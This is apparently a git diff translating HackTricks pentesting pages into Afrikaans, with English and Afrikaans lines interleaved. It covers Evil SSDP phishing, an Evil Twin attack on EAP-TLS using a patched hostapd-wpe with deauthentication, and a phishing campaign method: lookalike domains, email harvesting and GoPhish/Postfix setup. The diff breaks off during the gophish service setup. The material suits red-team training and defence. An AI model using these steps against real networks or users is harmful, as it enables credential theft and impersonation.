UPnP-argitektuur bestaan uit ses lae: addressing, discovery, description, control, eventing en presentation. In die begin probeer toestelle 'n IP-adres verkry of self een toewys (AutoIP). Die ontdekkingsfase behels die SSDP, waar toestelle aktief M-SEARCH-versoeke stuur of passief NOTIFY-boodskappe uitsaai om dienste aan te kondig. Die beheerlaag, wat noodsaaklik is vir kliënt-toestelinteraksie, maak gebruik van SOAP-boodskappe vir beveluitvoering gebaseer op toestelbeskrywings in XML-lêers.
## **IGD & Tools Overview**
## **IGD & Gereedskapsoorsig**
IGD (Internet Gateway Device) facilitates temporary port mappings in NAT setups, allowing command acceptance via open SOAP control points despite standard WAN interface restrictions. Tools like **Miranda** aid in UPnP service discovery and command execution. **Umap** exposes WAN-accessible UPnP commands, while repositories like **upnp-arsenal** offer an array of UPnP tools. **Evil SSDP** specializes in phishing via spoofed UPnP devices, hosting templates to mimic legitimate services.
IGD (Internet Gateway Device) fasiliteer tydelike poorttoewysings in NAT-opsette, wat bevelaanvaarding via oop SOAP-beheerpunte moontlik maak, ten spyte van standaard WAN-interfacebeperkings. Gereedskap soos **Miranda** help met UPnP-diensontdekking en beveluitvoering. **Umap** stel WAN-toeganklike UPnP-bevele bloot, terwyl opslagplekke soos **upnp-arsenal** 'n verskeidenheid UPnP-gereedskap bied. **Evil SSDP** spesialiseer in hengelary deur middel van vervalsde UPnP-toestelle, met sjablone om legitieme dienste na te boots.
## **Evil SSDP Practical Usage**
## **Praktiese Gebruik van Evil SSDP**
Evil SSDP effectively creates convincing fake UPnP devices, manipulating users into interacting with seemingly authentic services. Users, tricked by the genuine appearance, may provide sensitive information like credentials. The tool's versatility extends to various templates, mimicking services like scanners, Office365, and even password vaults, capitalizing on user trust and network visibility. Post credential capture, attackers can redirect victims to designated URLs, maintaining the deception's credibility.
Evil SSDP skep oortuigende valse UPnP-toestelle wat gebruikers manipuleer om met skynbaar egte dienste te interaksieer. Gebruikers, mislei deur die egte voorkoms, kan sensitiewe inligting soos geloofsbriewe verskaf. Die gereedskap se veelsydigheid strek tot verskeie sjablone, wat dienste soos skandeerders, Office365 en selfs wagwoordkluisse naboots, deur gebruik te maak van gebruikersvertroue en netwerk-sigbaarheid. Na die vaslegging van geloofsbriewe kan aanvallers slagoffers na aangewese URL's omskakel, terwyl die geloofwaardigheid van die misleiding behou word.
## **Mitigation Strategies**
## **Versagtingsstrategieë**
To combat these threats, recommended measures include:
Aanbevole maatreëls om hierdie bedreigings te beveg, sluit in:
- Disabling UPnP on devices when not needed.
- Educating users about phishing and network security.
- Monitoring network traffic for unencrypted sensitive data.
- Deaktiveer UPnP op toestelle wanneer dit nie nodig is nie.
- Verskaf gebruikers met opleiding oor hengelary en netwerksekuriteit.
- Monitor netwerkverkeer vir onversleutelde sensitiewe data.
In essence, while UPnP offers convenience and network fluidity, it also opens doors to potential exploitation. Awareness and proactive defense are key to ensuring network integrity.
In die essensie bied UPnP gerief en netwerk-vloeibaarheid, maar dit maak ook deure oop vir potensiële uitbuiting. Bewustheid en proaktiewe verdediging is sleutel tot die verseker van netwerkintegriteit.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

821
generic-methodologies-and-resources/pentesting-wifi/README.md
View file

File diff suppressed because it is too large Load diff

84
generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md
View file

@ -1,76 +1,76 @@
# Evil Twin EAP-TLS
# Bose Tweeling EAP-TLS
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien!
{% embed url="https://go.intigriti.com/hacktricks" %}
At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali (2019v3) anymore.\
Anyway, it's easy to make them work.\
You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](https://w1.fi/releases/) and before compiling again hostapd-wpe install: `apt-get install libssl1.0-dev`
Op 'n stadium moes ek die voorgestelde oplossing deur die onderstaande pos gebruik, maar die stappe in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) het nie meer gewerk in moderne kali (2019v3) nie.\
In elk geval is dit maklik om hulle te laat werk.\
Jy hoef net die hostapd-2.6 van hier af te laai: [https://w1.fi/releases/](https://w1.fi/releases/) en voordat jy weer hostapd-wpe installeer, voer die volgende bevel uit: `apt-get install libssl1.0-dev`
### Analyzing and Exploiting EAP-TLS in Wireless Networks
### Analiseer en Exploiteer EAP-TLS in Draadlose Netwerke
#### Background: EAP-TLS in Wireless Networks
EAP-TLS is a security protocol providing mutual authentication between client and server using certificates. The connection is only established if both the client and the server authenticate each other's certificates.
#### Agtergrond: EAP-TLS in Draadlose Netwerke
EAP-TLS is 'n sekuriteitsprotokol wat wederkerige outentifikasie tussen klient en bediener bied deur middel van sertifikate. Die verbinding word slegs tot stand gebring as beide die klient en die bediener mekaar se sertifikate outentifiseer.
#### Challenge Encountered
During an assessment, an interesting error was encountered when using the `hostapd-wpe` tool. The tool rejected the client's connection due to the client's certificate being signed by an unknown Certificate Authority (CA). This indicated that the client did trust the fake server's certificate, pointing to lax security configurations on the client side.
#### Uitdaging Teëgekom
Tydens 'n assessering is 'n interessante fout teëgekom toe die `hostapd-wpe`-instrument gebruik is. Die instrument het die klient se verbinding afgekeur omdat die klient se sertifikaat deur 'n onbekende Sertifikaatowerheid (CA) onderteken is. Dit dui daarop dat die klient die vals bediener se sertifikaat vertrou het, wat wys op lakse sekuriteitskonfigurasies aan die klientkant.
#### Objective: Setting Up a Man-in-the-Middle (MiTM) Attack
The goal was to modify the tool to accept any client certificate. This would allow the establishment of a connection with the malicious wireless network and enable a MiTM attack, potentially capturing plaintext credentials or other sensitive data.
#### Doelwit: Opstel van 'n Man-in-die-Middel (MiTM) Aanval
Die doel was om die instrument te wysig om enige klient-sertifikaat te aanvaar. Dit sou die totstandbrenging van 'n verbinding met die kwaadwillige draadlose netwerk moontlik maak en 'n MiTM-aanval moontlik maak, wat moontlik platte tekslegitimasiebewyse of ander sensitiewe data kan vasvang.
#### Solution: Modifying `hostapd-wpe`
Analysis of the source code of `hostapd-wpe` revealed that the client certificate validation was controlled by a parameter (`verify_peer`) in the OpenSSL function `SSL_set_verify`. By changing this parameter's value from 1 (validate) to 0 (do not validate), the tool was made to accept any client certificate.
#### Oplossing: Wysiging van `hostapd-wpe`
'n Ontleding van die bronkode van `hostapd-wpe` het aan die lig gebring dat die outentifikasie van die klient-sertifikaat beheer word deur 'n parameter (`verify_peer`) in die OpenSSL-funksie `SSL_set_verify`. Deur hierdie parameter se waarde te verander van 1 (valideer) na 0 (moenie valideer nie), is die instrument gemaak om enige klient-sertifikaat te aanvaar.
#### Execution of the Attack
1. **Environment Check:** Use `airodump-ng` to monitor wireless networks and identify targets.
2. **Set Up Fake AP:** Run the modified `hostapd-wpe` to create a fake Access Point (AP) mimicking the target network.
3. **Captive Portal Customization:** Customize the login page of the captive portal to appear legitimate and familiar to the target user.
4. **De-authentication Attack:** Optionally, perform a de-auth attack to disconnect the client from the legitimate network and connect them to the fake AP.
5. **Capturing Credentials:** Once the client connects to the fake AP and interacts with the captive portal, their credentials are captured.
#### Uitvoering van die Aanval
1. **Omgewingskontrole:** Gebruik `airodump-ng` om draadlose netwerke te monitor en teikens te identifiseer.
2. **Stel Valse AP op:** Voer die gewysigde `hostapd-wpe` uit om 'n valse Toegangspunt (AP) te skep wat die teikennetwerk naboots.
3. **Aangepaste Vangnetportaal:** Pas die aantekenblad van die vangnetportaal aan om legitiem en bekend aan die teiken-gebruiker te lyk.
4. **De-authentifikasie-aanval:** Opsioneel, voer 'n de-authentifikasie-aanval uit om die klient van die regmatige netwerk af te koppel en hulle aan die valse AP te koppel.
5. **Vasvang van Legitimasiebewyse:** Sodra die klient aan die valse AP koppel en met die vangnetportaal interaksie het, word hul legitimasiebewyse vasgevang.
#### Observations from the Attack
- On Windows machines, the system might automatically connect to the fake AP, presenting the captive portal when web navigation is attempted.
- On an iPhone, the user might be prompted to accept a new certificate and then presented with the captive portal.
#### Waarnemings van die Aanval
- Op Windows-masjiene kan die stelsel outomaties aan die valse AP koppel en die vangnetportaal vertoon wanneer webnavigasie probeer word.
- Op 'n iPhone kan die gebruiker versoek word om 'n nuwe sertifikaat te aanvaar en dan die vangnetportaal vertoon te word.
#### Conclusion
While EAP-TLS is considered secure, its effectiveness heavily depends on the correct configuration and cautious behavior of end-users. Misconfigured devices or unsuspecting users accepting rogue certificates can undermine the security of an EAP-TLS protected network.
#### Gevolgtrekking
Alhoewel EAP-TLS as veilig beskou word, hang sy doeltreffendheid sterk af van die korrekte konfigurasie en versigtige gedrag van eindgebruikers. Verkeerd gekonfigureerde toestelle of argeloos gebruikers wat vals sertifikate aanvaar, kan die sekuriteit van 'n EAP-TLS-beskermde netwerk ondermyn.
For further details check https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
Vir verdere besonderhede, sien https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
## References
## Verwysings
* [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

424
generic-methodologies-and-resources/phishing-methodology/README.md
View file

@ -1,57 +1,57 @@
# Phishing Methodology
# Phishing Metodologie
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Methodology
## Metodologie
1. Recon the victim
1. Select the **victim domain**.
2. Perform some basic web enumeration **searching for login portals** used by the victim and **decide** which one you will **impersonate**.
3. Use some **OSINT** to **find emails**.
2. Prepare the environment
1. **Buy the domain** you are going to use for the phishing assessment
2. **Configure the email service** related records (SPF, DMARC, DKIM, rDNS)
3. Configure the VPS with **gophish**
3. Prepare the campaign
1. Prepare the **email template**
2. Prepare the **web page** to steal the credentials
4. Launch the campaign!
1. Verken die slagoffer
1. Kies die **slagoffer-domein**.
2. Voer 'n paar basiese webondersoeke uit deur te soek na aanmeldingsportale wat deur die slagoffer gebruik word en **besluit** watter een jy sal **impersoneer**.
3. Gebruik 'n bietjie **OSINT** om e-posse te **vind**.
2. Berei die omgewing voor
1. **Koop die domein** wat jy gaan gebruik vir die hengel-assessering
2. **Konfigureer die e-posdiens** verwante rekords (SPF, DMARC, DKIM, rDNS)
3. Konfigureer die VPS met **gophish**
3. Berei die veldtog voor
1. Berei die **e-pos-sjabloon** voor
2. Berei die **webbladsy** voor om die geloofsbriewe te steel
4. Begin die veldtog!
## Generate similar domain names or buy a trusted domain
## Genereer soortgelyke domeinname of koop 'n betroubare domein
### Domain Name Variation Techniques
### Tegnieke vir die variasie van domeinname
* **Keyword**: The domain name **contains** an important **keyword** of the original domain (e.g., zelster.com-management.com).
* **hypened subdomain**: Change the **dot for a hyphen** of a subdomain (e.g., www-zelster.com).
* **New TLD**: Same domain using a **new TLD** (e.g., zelster.org)
* **Homoglyph**: It **replaces** a letter in the domain name with **letters that look similar** (e.g., zelfser.com).
* **Transposition:** It **swaps two letters** within the domain name (e.g., zelster.com).
* **Singularization/Pluralization**: Adds or removes “s” at the end of the domain name (e.g., zeltsers.com).
* **Omission**: It **removes one** of the letters from the domain name (e.g., zelser.com).
* **Repetition:** It **repeats one** of the letters in the domain name (e.g., zeltsser.com).
* **Replacement**: Like homoglyph but less stealthy. It replaces one of the letters in the domain name, perhaps with a letter in proximity of the original letter on the keyboard (e.g, zektser.com).
* **Subdomained**: Introduce a **dot** inside the domain name (e.g., ze.lster.com).
* **Insertion**: It **inserts a letter** into the domain name (e.g., zerltser.com).
* **Missing dot**: Append the TLD to the domain name. (e.g., zelstercom.com)
* **Sleutelwoord**: Die domeinnaam **bevat** 'n belangrike **sleutelwoord** van die oorspronklike domein (bv. zelster.com-management.com).
* **Gehypeniseerde subdomein**: Verander die **punt vir 'n strepie** van 'n subdomein (bv. www-zelster.com).
* **Nuwe TLD**: Dieselfde domein met 'n **nuwe TLD** (bv. zelster.org)
* **Homoglyf**: Dit **vervang** 'n letter in die domeinnaam met **letters wat soortgelyk lyk** (bv. zelfser.com).
* **Omruiling**: Dit **ruil twee letters** binne die domeinnaam om (bv. zelster.com).
* **Enkelvoud/Meervoud**: Voeg of verwyder "s" aan die einde van die domeinnaam (bv. zeltsers.com).
* **Weglating**: Dit **verwyder een** van die letters uit die domeinnaam (bv. zelser.com).
* **Herhaling**: Dit **herhaal een** van die letters in die domeinnaam (bv. zeltsser.com).
* **Vervanging**: Soos homoglyf, maar minder sluipend. Dit vervang een van die letters in die domeinnaam, miskien met 'n letter in die nabyheid van die oorspronklike letter op die sleutelbord (bv. zektser.com).
* **Subdomein**: Voeg 'n **punt** in die domeinnaam in (bv. ze.lster.com).
* **Invoeging**: Dit **voeg 'n letter** by die domeinnaam in (bv. zerltser.com).
* **Ontbrekende punt**: Voeg die TLD by die domeinnaam. (bv. zelstercom.com)
**Automatic Tools**
**Outomatiese hulpmiddels**
* [**dnstwist**](https://github.com/elceef/dnstwist)
* [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
**Websites**
**Webwerwe**
* [https://dnstwist.it/](https://dnstwist.it)
* [https://dnstwister.report/](https://dnstwister.report)
@ -59,54 +59,51 @@ Other ways to support HackTricks:
### Bitflipping
There is a **possibility that one of some bits stored or in communication might get automatically flipped** due to various factors like solar flares, cosmic rays, or hardware errors.
Daar is 'n **moontlikheid dat een van die bits wat gestoor of in kommunikasie is, outomaties omgeskakel kan word** as gevolg van verskeie faktore soos sonvlamme, kosmiese strale of hardewarefoute.
When this concept is **applied to DNS requests**, it is possible that the **domain received by the DNS server** is not the same as the domain initially requested.
Wanneer hierdie konsep **toegepas word op DNS-versoeke**, is dit moontlik dat die **domein wat deur die DNS-bediener ontvang word**, nie dieselfde is as die aanvanklike gevraagde domein nie.
For example, a single bit modification in the domain "windows.com" can change it to "windnws.com."
Byvoorbeeld, 'n enkele bit-wysiging in die domein "windows.com" kan dit verander na "windnws.com."
Attackers may **take advantage of this by registering multiple bit-flipping domains** that are similar to the victim's domain. Their intention is to redirect legitimate users to their own infrastructure.
Aanvallers kan hiervan **profiteer deur verskeie bit-flipping-domeine** te registreer wat soortgelyk is aan die slagoffer se domein. Hulle bedoeling is om legitieme gebruikers na hul eie infrastruktuur om te lei.
For more information read [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
Vir meer inligting, lees [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
### Buy a trusted domain
### Koop 'n betroubare domein
You can search in [https://www.expireddomains.net/](https://www.expireddomains.net) for a expired domain that you could use.\
In order to make sure that the expired domain that you are going to buy **has already a good SEO** you could search how is it categorized in:
Jy kan soek na 'n vervalde domein wat jy kan gebruik by [https://www.expireddomains.net/](https://www.expireddomains.net).\
Om seker te maak dat die vervalde domein wat jy gaan koop **reeds 'n goeie SEO het**, kan jy nagaan hoe dit gekategoriseer word in:
* [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter)
* [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/)
## Discovering Emails
## Ontdek e-posse
* [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) (100% free)
* [https://phonebook.cz/](https://phonebook.cz) (100% free)
* [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) (100% gratis)
* [https://phonebook.cz/](https://phonebook.cz) (100% gratis)
* [https://maildb.io/](https://maildb.io)
* [https://hunter.io/](https://hunter.io)
* [https://anymailfinder.com/](https://anymailfinder.com)
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\
Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible.
Om meer geldige e-posse te **ontdek** of die een wat jy reeds ontdek het, te **verifieer**, kan jy kyk of jy hul smtp-bedieners kan brute force. [Leer hoe om e-posadres te verifieer/ontdek hier](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\
Moenie ook vergeet dat as gebruikers **enige webportaal gebruik om by hul e-posse te kom**, jy kan nagaan of dit vatbaar is vir **gebruikersnaam-brute force**, en die kwesbaarheid uitbuit indien moontlik.
## Configuring GoPhish
## Konfigurering van GoPhish
### Installation
### Installasie
You can download it from [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
Download and decompress it inside `/opt/gophish` and execute `/opt/gophish/gophish`\
You will be given a password for the admin user in port 3333 in the output. Therefore, access that port and use those credentials to change the admin password. You may need to tunnel that port to local:
Jy kan dit aflaai vanaf [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
Laai dit af en dekomprimeer dit binne `/opt/gophish` en voer `/opt/gophish/gophish` uit\
Jy sal 'n wagwoord vir die admin-gebruiker kry op poort 3333 in die uitset. Toegang daardie poort en gebruik daardie geloofsbriewe om die admin-wagwoord te verander. Jy mag dalk daardie poort na plaaslike toe moet skuif:
```bash
ssh -L 3333:127.0.0.1:3333 <user>@<ip>
```
### Konfigurasie
### Configuration
**TLS certificate configuration**
Before this step you should have **already bought the domain** you are going to use and it must be **pointing** to the **IP of the VPS** where you are configuring **gophish**.
**TLS-sertifikaatkonfigurasie**
Voordat hierdie stap geneem word, moet jy die domein wat jy gaan gebruik, **reeds gekoop** het en dit moet na die **IP van die VPS** waar jy **gophish** konfigureer, **verwys**.
```bash
DOMAIN="<domain>"
wget https://dl.eff.org/certbot-auto
@ -122,67 +119,61 @@ mkdir /opt/gophish/ssl_keys
cp "/etc/letsencrypt/live/$DOMAIN/privkey.pem" /opt/gophish/ssl_keys/key.pem
cp "/etc/letsencrypt/live/$DOMAIN/fullchain.pem" /opt/gophish/ssl_keys/key.crt
```
**Poskonfigurasie**
**Mail configuration**
Begin deur te installeer: `apt-get install postfix`
Start installing: `apt-get install postfix`
Then add the domain to the following files:
Voeg dan die domein by die volgende lêers:
* **/etc/postfix/virtual\_domains**
* **/etc/postfix/transport**
* **/etc/postfix/virtual\_regexp**
**Change also the values of the following variables inside /etc/postfix/main.cf**
**Verander ook die waardes van die volgende veranderlikes binne /etc/postfix/main.cf**
`myhostname = <domain>`\
`mydestination = $myhostname, <domain>, localhost.com, localhost`
Finally modify the files **`/etc/hostname`** and **`/etc/mailname`** to your domain name and **restart your VPS.**
Verander uiteindelik die lêers **`/etc/hostname`** en **`/etc/mailname`** na jou domeinnaam en **herlaai jou VPS.**
Now, create a **DNS A record** of `mail.<domain>` pointing to the **ip address** of the VPS and a **DNS MX** record pointing to `mail.<domain>`
Now lets test to send an email:
Skep nou 'n **DNS A-rekord** van `mail.<domain>` wat na die **ip-adres** van die VPS wys en 'n **DNS MX-rekord** wat na `mail.<domain>` wys.
Laat ons nou toets om 'n e-pos te stuur:
```bash
apt install mailutils
echo "This is the body of the email" | mail -s "This is the subject line" test@email.com
```
**Gophish konfigurasie**
**Gophish configuration**
Stop the execution of gophish and lets configure it.\
Modify `/opt/gophish/config.json` to the following (note the use of https):
Stop die uitvoering van gophish en laat ons dit konfigureer.\
Wysig `/opt/gophish/config.json` na die volgende (let op die gebruik van https):
```bash
{
"admin_server": {
"listen_url": "127.0.0.1:3333",
"use_tls": true,
"cert_path": "gophish_admin.crt",
"key_path": "gophish_admin.key"
},
"phish_server": {
"listen_url": "0.0.0.0:443",
"use_tls": true,
"cert_path": "/opt/gophish/ssl_keys/key.crt",
"key_path": "/opt/gophish/ssl_keys/key.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
"admin_server": {
"listen_url": "127.0.0.1:3333",
"use_tls": true,
"cert_path": "gophish_admin.crt",
"key_path": "gophish_admin.key"
},
"phish_server": {
"listen_url": "0.0.0.0:443",
"use_tls": true,
"cert_path": "/opt/gophish/ssl_keys/key.crt",
"key_path": "/opt/gophish/ssl_keys/key.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
}
```
**Stel gophish-diens op**
**Configure gophish service**
In order to create the gophish service so it can be started automatically and managed a service you can create the file `/etc/init.d/gophish` with the following content:
